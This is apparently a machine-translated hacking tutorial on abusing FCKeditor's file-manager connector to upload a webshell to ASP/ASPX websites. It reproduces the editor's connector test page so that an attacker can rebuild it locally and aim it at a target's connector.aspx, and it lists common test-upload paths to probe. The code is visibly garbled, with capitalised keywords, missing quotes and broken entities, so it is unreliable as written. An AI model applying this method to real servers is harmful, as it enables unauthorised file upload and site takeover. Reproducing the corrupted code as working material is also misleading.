FCKeditor does not have an alternative secondary upload for the test upload page

The second FCKeditor upload takes shell as a typical FCKeditor vulnerability. This second upload requires support for aspx and FckEditor, editor, filemanager, connectors, aspx, and connector. the aspx file is deleted. The secondary upload vulnerability is convenient for the ASPX site and has a high success rate. Of course, it is no problem if the ASP site supports ASPX and file deletion.

During the secondary upload process, we often find some test upload pages in FckEditor for upload. However, some test upload pages have been deleted, and I have met many times before, however, when the test upload page is deleted, You can construct an upload page locally and submit it. Make sure that FckEditor/editor/filemanager/connectors/aspx/connector are correct. the aspx file exists, and the server supports ASPX parsing.

Code:

<! --
* FCKeditor-The text editor for Internet-http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* = Begin license =
*
* Licensed under the terms of any of the following licenses at your
* Choice:
*
*-GNU General Public License Version 2 or later (the "GPL ")
* Http://www.gnu.org/licenses/gpl.html
*
*-GNU Lesser General Public License Version 2.1 or later (the "LGPL ")
* Http://www.gnu.org/licenses/lgpl.html
*
*-Mozilla Public License Version 1.1 or later (the "MPL ")
* Http://www.mozilla.org/MPL/MPL-1.1.html
*
* = End license =
*
* Test page for the File Browser connectors.
-->
<! Doctype html public "-// W3C // dtd html 4.0 Transitional // EN">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Title> FCKeditor-Connectors Tests </title>
<Script type = "text/javascript">

Function BuildBaseUrl (command)
{
Var sUrl =
Document. getElementById (cmbConnector). value +
? Command = + command +
& Amp; Type = + document. getElementById (cmbType). value +
& CurrentFolder = + encodeURIComponent (document. getElementById (txtFolder). value );

Return sUrl;
}

Function SetFrameUrl (url)
{
Document. getElementById (eRunningFrame). src = url;

Document. getElementById (eUrl). innerHTML = url;
}

Function GetFolders ()
{
SetFrameUrl (BuildBaseUrl (GetFolders ));
Return false;
}

Function GetFoldersAndFiles ()
{
SetFrameUrl (BuildBaseUrl (GetFoldersAndFiles ));
Return false;
}

Function CreateFolder ()
{
Var sFolder = prompt (Type the folder name:, Test Folder );

If (! SFolder)
Return false;

Var sUrl = BuildBaseUrl (CreateFolder );
SUrl + = & NewFolderName = + encodeURIComponent (sFolder );

SetFrameUrl (sUrl );
Return false;
}

Function OnUploadCompleted (errorNumber, fileName)
{
Switch (errorNumber)
{
Case 0:
Alert (File uploaded with no errors );
Break;
Case 201:
GetFoldersAndFiles ();
Alert (A file with the same name is already available. The uploaded file has been renamed to "+ fileName + ");
Break;
Case 202:
Alert (Invalid file );
Break;
Default:
Alert (Error on file upload. Error number: + errorNumber );
Break;
}
}

This. frames. frmUpload = this;

Function SetAction ()
{
Var sUrl = BuildBaseUrl (FileUpload );
Document. getElementById (eUrl). innerHTML = sUrl;
Document. getElementById (frmUpload). action = sUrl;
}

</Script>
</Head>
<Body>
<Table height = "100%" cellspacing = "0" cellpadding = "0" width = "100%" border = "0">
<Tr>
<Td>
<Table cellspacing = "0" cellpadding = "0" border = "0">
<Tr>
<Td>
Connector: <br/>
<Select id = "cmbConnector" name = "cmbConnector">
<Option value = "asp/connector. asp" selected = "selected"> ASP </option>
<Option value = "ASP. NetHttp://www.xxx.com/FckEditor/editor/filemanager/connectors/aspx/connector.aspx> ASP. Net </option>
<Option value = "cfm/connector. cfm"> ColdFusion </option>
<Option value = "lasso/connector. lasso"> Lasso </option>
<Option value = "perl/connector. cgi"> Perl </option>
<Option value = "php/connector. php"> PHP </option>
<Option value = "py/connector. py"> Python </option>
</Select>
</Td>
<Td>
</Td>
<Td>
Current Folder <br/>
<Input id = "txtFolder" type = "text" value = "/" name = "txtFolder"/> </td>
<Td>
</Td>
<Td>
Resource Type <br/>
<Select id = "cmbType" name = "cmbType">
<Option value = "File" selected = "selected"> File </option>

<Option value = "Image"> Image </option>
<Option value = "Flash"> Flash </option>
<Option value = "Media"> Media </option>
<Option value = "Invalid"> Invalid Type (for testing) </option>
</Select>
</Td>
</Tr>
</Table>
<Br/>
<Table cellspacing = "0" cellpadding = "0" border = "0">
<Tr>
<Td valign = "top">
<A href = "#" onclick = "GetFolders ();"> Get Folders </a> </td>
<Td>
</Td>
<Td valign = "top">
<A href = "#" onclick = "GetFoldersAndFiles ();"> Get Folders and Files </a> </td>
<Td>
</Td>
<Td valign = "top">
<A href = "#" onclick = "CreateFolder ();"> Create Folder </a> </td>
<Td>
</Td>
<Td valign = "top">
<Form id = "frmUpload" action = "" target = "eRunningFrame" method = "post" enctype = "multipart/form-data">
File Upload <br/>
<Input id = "txtFileUpload" type = "file" name = "NewFile"/>
<Input type = "submit" value = "Upload" onclick = "SetAction ();"/>
</Form>
</Td>
</Tr>
</Table>
<Br/>
URL: <span id = "eUrl"> </span>
</Td>
</Tr>
<Tr>
& Lt; td height = "100%" valign = "top" & gt;
<Iframe id = "eRunningFrame" src = "javascript: void (0)" name = "eRunningFrame" width = "100%"
Height = "100%"> </iframe>
</Td>
</Tr>
</Table>
</Body>
</Html>

<Option value = "ASP. NetHttp://www.xxx.com/FckEditor/editor/filemanager/connectors/aspx/connector.aspx "> ASP. Net </option> is ASXP upload execution path, asp and php is also the same, when you need to add !!

Upload address of the test file in FCKeditor
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html